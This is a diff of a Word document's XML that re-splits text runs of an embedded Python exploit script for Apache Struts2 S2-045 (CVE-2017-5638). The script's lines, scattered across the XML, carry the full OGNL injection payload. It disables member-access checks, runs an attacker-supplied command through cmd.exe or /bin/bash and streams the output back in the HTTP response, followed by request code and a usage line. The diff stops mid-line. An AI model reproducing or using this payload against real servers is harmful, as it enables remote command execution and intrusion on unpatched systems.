+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3495,7 +3588,43 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."</w:t>
+        <w:t>"(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>dm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>=@</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ognl.OgnlContext@DEFAULT_MEMBER_ACCESS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3529,7 +3658,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(#_memberAccess?"</w:t>
+        <w:t>"(#_</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>memberAccess</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>?"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3563,7 +3710,43 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(#_memberAccess=#dm):"</w:t>
+        <w:t>"(#_</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>memberAccess</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>=#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>dm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>):"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3597,7 +3780,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."</w:t>
+        <w:t>"((#container=#context['</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>com.opensymphony</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.xwork2.ActionContext.container'])."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3631,7 +3832,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."</w:t>
+        <w:t>"(#ognlUtil=#</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>container.getInstance</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3665,7 +3884,43 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(#ognlUtil.getExcludedPackageNames().clear())."</w:t>
+        <w:t>"(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ognlUtil.getExcludedPackageNames</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>).clear</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>())."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3699,7 +3954,43 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(#ognlUtil.getExcludedClasses().clear())."</w:t>
+        <w:t>"(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ognlUtil.getExcludedClasses</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>).clear</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>())."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3733,7 +4024,45 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(#context.setMemberAccess(#dm))))."</w:t>
+        <w:t>"(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>context.setMemberAccess</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>dm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>))))."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3767,7 +4096,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(#cmd='%s')."</w:t>
+        <w:t>"(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>='%s')."</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3793,6 +4140,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -3801,6 +4149,7 @@
         </w:rPr>
         <w:t>cmd</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3833,7 +4182,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."</w:t>
+        <w:t>"(#iswin=(@</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>java.lang</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.System@getProperty('os.name').toLowerCase().contains('win')))."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3867,7 +4234,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."</w:t>
+        <w:t>"(#cmds=(#</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>iswin?{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3901,7 +4286,53 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(#p=new java.lang.ProcessBuilder(#cmds))."</w:t>
+        <w:t xml:space="preserve">"(#p=new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>java.lang</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.ProcessBuilder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmds</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>))."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3935,7 +4366,45 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(#p.redirectErrorStream(true)).(#process=#p.start())."</w:t>
+        <w:t>"(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>p.redirectErrorStream</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(true)).(#process=#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>p.start</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>())."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3969,7 +4438,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."</w:t>
+        <w:t>"(#ros=(@</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>org.apache</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.struts2.ServletActionContext@getResponse().getOutputStream()))."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4003,7 +4490,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."</w:t>
+        <w:t>"(@</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>org.apache.commons.io.IOUtils</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>@copy(#process.getInputStream(),#ros))."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4037,7 +4542,27 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"(#ros.flush())}"</w:t>
+        <w:t>"(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ros.flush</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>())}"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4141,7 +4666,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>urllib2.Request(url, headers=headers)</w:t>
+        <w:t>urllib2.Request(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>, headers=headers)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4175,7 +4718,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>urllib2.urlopen(request).read()</w:t>
+        <w:t>urllib2.urlopen(request</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>).read</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4203,13 +4764,25 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>httplib.IncompleteRead, e:</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>httplib.IncompleteRead</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>, e:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4237,6 +4810,8 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -4245,6 +4820,8 @@
         </w:rPr>
         <w:t>e.partial</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4467,7 +5044,27 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>len(sys.argv) !=</w:t>
+        <w:t>len(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>sys.argv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>) !=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4501,7 +5098,61 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>        print("[*] struts2_S2-045.py &lt;url&gt; &lt;cmd&gt;")</w:t>
+        <w:t>        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>print(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"[*] struts2_S2-045.py &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>&gt; &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>&gt;")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4538,25 +5189,61 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>        print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>        url =</w:t>
